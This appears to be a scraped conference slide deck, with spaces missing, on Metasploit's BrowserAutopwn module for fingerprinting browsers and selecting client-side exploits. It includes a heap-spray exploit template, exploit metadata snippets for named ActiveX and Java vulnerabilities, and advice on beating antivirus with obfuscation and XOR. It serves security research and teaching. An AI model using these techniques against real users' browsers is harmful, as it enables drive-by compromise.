Professional Documents
Culture Documents
Automaticbrowser
fingerprintingand
exploitationwiththe
MetasploitFramework:
BrowserAutopwn
JamesLee
BrowserAutopwn
AuxiliarymodulefortheMetasploitFramework
Fingerprintsaclient
Determineswhatexploitsmightwork
Usedtosuck
Nowitdoesn't
Outline
Intro
Clusterbombs
Guidedmissiles
Fingerprintingandtargeting
Stealth
Demos
Commercialcomparison
#whoami
JamesLee
egypt
CoFounder,TeardropSecurity
Developer,MetasploitProject
MyInvolvementinMSF
Startedsubmittingpatchesandbugreportsin
2007
HDgavemecommitaccessinApril2008
BroketherepoApril2008
TheMetasploitFramework
CreatedbyHDMoorein2003
ncursesbasedgame
Laterbecamearealexploitframeworkinperl
Rewritteninrubyin2005
Whichiswaybetterthanpython
Extensibleframeworkforwritingexploits
I<3MSF
Modularpayloadsandencoders
Manyprotocolsalreadyimplemented
Manynonexploittools
Allkindsofexploits
Traditionalserverside
Clientsides
WhyClientsides
Karmetasploit
Anyothertoolthatgetsyouinthemiddle
Usersareweakestlink,blah,blah,blah
SeeChrisGates
ClientExploitsinMSF
ExtensiveHTTPsupport
Heapsprayintwolinesofcode
Sotirov's.NETDLL,heapfengshui
WiderangeofprotocollevelIDSevasion
Simpleexploitin~10linesofcode
SimpleExploit
content=<html><body>
<objectid='obj'classid='...'></object><script>
#{js_heap_spray}
sprayHeap(#{payload.encoded},#{target.ret},0x4000);
obj.VulnMethod(#{[target.ret].pack(V)*1000});
</script></body></html>
send_response(client,content)
10
OrArbitrarilyComplex
11
ani_loadimage_chunksizeis581linesofcode
AsofJune28,MSFhas85browserexploit
modules
Problem
Solution
ClusterBombApproach
IsitIE?SendalltheIEsploits
IsitFF?SendalltheFFsploits
Originallyexploitswereadhoc
14
Painintheasswhennewsploitscomeout
Problem
Solution
GuidedMissileApproach
BetterclientandOSfingerprinting
Onlysendexploitslikelytosucceed
17
lesslikelytocrashorhangthebrowser
BrowserisIE7?Don'tsendIE6sploits,etc.
FingerprintingtheClient
UserAgent
18
Easytospoof
Easytochangeina
proxy
Atinybitharderto
changeinJS
FingerprintingtheClient
VariousJSobjectsonlyexistinonebrowser
Someonlyexistincertainversions
window.createPopup,Array.every,window.Iterator
Renderingdifferencesandparserbugs
19
window.opera,Array.every
IE'sconditionalcomments
InternetExplorer
Parserbugs,conditionalcomments
ScriptEngine*Version()
20
Reliable,butnotprecise
Almostuniqueacrossallcombinationsofclientand
OS
BroughttomyattentionbyJeromeAthias
Opera
window.opera.version()
21
Includesminorversion,e.g.9.61
HybridApproachforFF
22
Existenceof
document.getElementsByClassName
meansFirefox3.0
IfUserAgentsaysIE6,gowithFF3.0
IfUAsaysFF3.0.8,it'sprobablynotlying,so
usethemorespecificvalue
Safari
Stillinprogress
Existenceofwindow.console
Availabilityofwindow.onmousewheel
23
IfFirebugisinstalledonFF,showsupthere,too
Defaultstonull,sohavetochecktypeof
FingerprintingtheOS
UserAgent
Couldusesomethinglikep0f
Fromtheserverside,that'saboutit
24
InternetExplorer
25
Again,ScriptEngine*Version()
Almostuniqueacrossallcombinationsofclient
andOS,includingservicepack
Opera
Eachbuildhasauniqueopera.buildNumber()
Givesplatform,butnothingelse
26
Firefox
27
navigator.platformandfriendsareaffectedby
theUserAgentstring
navigator.oscpuisn't
Linuxi686
WindowsNT6.0
Others
Reallyallwe'releftwithistheUserAgent
That'sokay,mostdon'tlie
28
Andthosethatdoarelikelytobepatchedanyway
Generic,workseverywherewhenUAisnot
spoofed
FutureFingerprinting
QuickTime
Adobe
Lesswellknownthirdpartystuff
29
ActiveX
30
newActiveXObject()worksifyouhave
theclassname
Otherwise,IEdoesn'tseemtohaveageneric
waytotellifanActiveXobjectgotcreated
document.write(<object...>)
document.createElement(object)
Solution
31
typeof(obj.method)
'undefined'iftheobjectfailedtoinitialize
'unknown'orpossiblyarealtypeifitworked
TargetAcquired
WhatisitVulnerableto?
Coarsedeterminationserverside
Serversendssploitsthatmatchthebrowserand
OS,possiblyversion
Finedeterminationclientside
33
JavaScriptbuildsfingerprint,sendsitbacktothe
server
navigator.javaEnabledexists,try
mozilla_navigatorjava
SelectaMissile
Sortbyreliability
Exploitscontain
theirownJStests
Problem
Solution
36
Obfuscation
Randomizeidentifiers
Buildstringsfromotherthings
JSON/AJAX
Obfuscationisnotcrypto
37
Encryption
PutakeyintheURL
38
Notavailableinthestandalonescript
SimpleXORisenoughtobeatAVandNIDS
Iftheyfigureitout,it'seasytomakethecrypto
stronger
Demonstrations
39
Andwe'reback...
40
Ihopethatworked
NowhowdoYOUmakeexploitsworkwithin
thisframework?
WritingExploits
Addautopwn_info()totopofexploitclass
:ua_nameisanarrayofbrowsersthisexploit
willworkagainst
:vuln_testissomejavascripttotestforthe
vulnerability(unlessit'sActiveX)
41
Usuallycomesdirectlyfromtheexploitanyway
Example:mozilla_navigatorjava
includeMsf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name=>HttpClients::FF,
:javascript=>true,
:rank=>NormalRanking,#reliablememorycorruption
:vuln_test=>%Q|
if(
window.navigator.javaEnabled&&
window.navigator.javaEnabled()
){
is_vuln=true;
}
|,
})
42
Example:ms06_067_keyframe
includeMsf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name=>HttpClients::IE,
:javascript=>true,
:os_name=>OperatingSystems::WINDOWS,
:vuln_test=>'KeyFrame',
:classid=>'DirectAnimation.PathControl',
:rank=>NormalRanking#reliablememorycorruption
})
43
Example:winzip_fileview
includeMsf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name=>HttpClients::IE,
:javascript=>true,
:os_name=>OperatingSystems::WINDOWS,
:vuln_test=>'CreateFolderFromName',
:classid=>'{A09AE68FB14D43EDB713BA413F034904}',
:rank=>NormalRanking#reliablememorycorruption
})
44
BrowserAutopwnSummary
ReliableTargetAcquisition
SmartMissileSelection
StealthyfromanAVperspective
Easytoextend
Detectionresultsstoredinadatabase
45
CommercialComparison
Mpack
Firepack
Neosploit
Luckysploit
46
Mpack,Firepack
Hardtoacquire
Oldexploits
Detectionisonlyserverside
Hardtochangeorupdateexploits
Obfuscation+XOR
47
Neosploit
48
CompiledELFsrunasCGI
UnlessyougetthesourceordosomeRE,you
won'treallyknowwhatitdoes
Luckysploit
Realcrypto(RSA,RC4)
Evenhardertoacquire
49
BrowserAutopwn
Easytowritenewexploitsortakeoutoldones
Free(threeclauseBSDlicense)
Easytoget(http://metasploit.com)
NotwritteninPHP
50
OSandclientdetectionisclientside,more
reliableinpresenceofspoofedorborkedUA
Future
Moreflexiblepayloadselection
Stopwhenyougetashell
MaybeimpossibleinpresenceofNAT/proxies
EasiertouseJSobfuscation
UAProfformobiledevices
IntegrationwithMetaPhish
51
Downloadit
svncohttp://metasploit.com/svn/framework3/trunk
Submitpatchestomsfdev@metasploit.com
52
Thanks
hdm,valsmith,
tebo,mc,cg,Dean
deBeer,pragmatk
Everybodywho
helpedwithtesting
Whoevercreated
ActiveX